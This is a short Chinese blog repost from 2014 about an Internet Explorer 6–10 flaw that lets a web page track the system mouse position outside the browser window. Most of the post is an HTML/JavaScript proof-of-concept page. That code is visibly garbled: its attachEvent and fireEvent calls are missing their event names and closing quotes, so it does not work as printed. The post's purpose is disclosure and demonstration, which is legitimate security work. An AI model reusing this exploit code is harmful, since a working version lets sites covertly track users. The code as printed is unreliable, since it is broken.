IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色
2014-04-14 19:08
302 查看
刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent(" function() {
var detector = document.getElementById("detector");
detector.attachEvent(" function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent(" }, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>用IE打开新建的html文件http://perlin.blog.51cto.com/1202304/1123397
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本
- IE6-10浏览器鼠标坐标跟踪安全风险
- 关于在IE下的一个安全BUG --可用于跟踪用户的系统鼠标位置
- IE下的一个安全BUG —— 可实时跟踪系统鼠标位置
- IE下的一个安全BUG —— 可跟踪用户的系统鼠标位置
- 用 javascript 获取鼠标(光标)的坐标位置 兼容IE/Firefox等浏览器
- Windows Server 2003中的IIS 6.0默认设置是特别严格和安全的,最大只能传送 204800个字节,我们需要修改,以允许从IE中上传更大的附件。解决办法是
- 跟踪鼠标在窗口上的坐标
- 获取事件目标对象的位置坐标或者鼠标位置坐标(兼容IE和火狐)
- 简单的鼠标经过图片时变大,IE低版本浏览器不兼容
- js判断是否是ie浏览器且给出ie版本
- 目前最大的IPv6安全风险有哪些?
- IE浏览器故障 打开某些网页时IE弹出安全警告
- IE浏览器版本过低提示:iealert.js
- js判断是否是ie浏览器且给出ie版本
- FF,IE下鼠标坐标 offset client event的区别
- 如何不让IE提示——当前安全设置会使计算机有风险
- 简单的鼠标经过图片时变大,IE低版本浏览器不兼容
- JavaScript基础 event(For IE) 显示鼠标点击处的坐标值 距离窗口的距离 距离网页的距离 距离屏幕的距离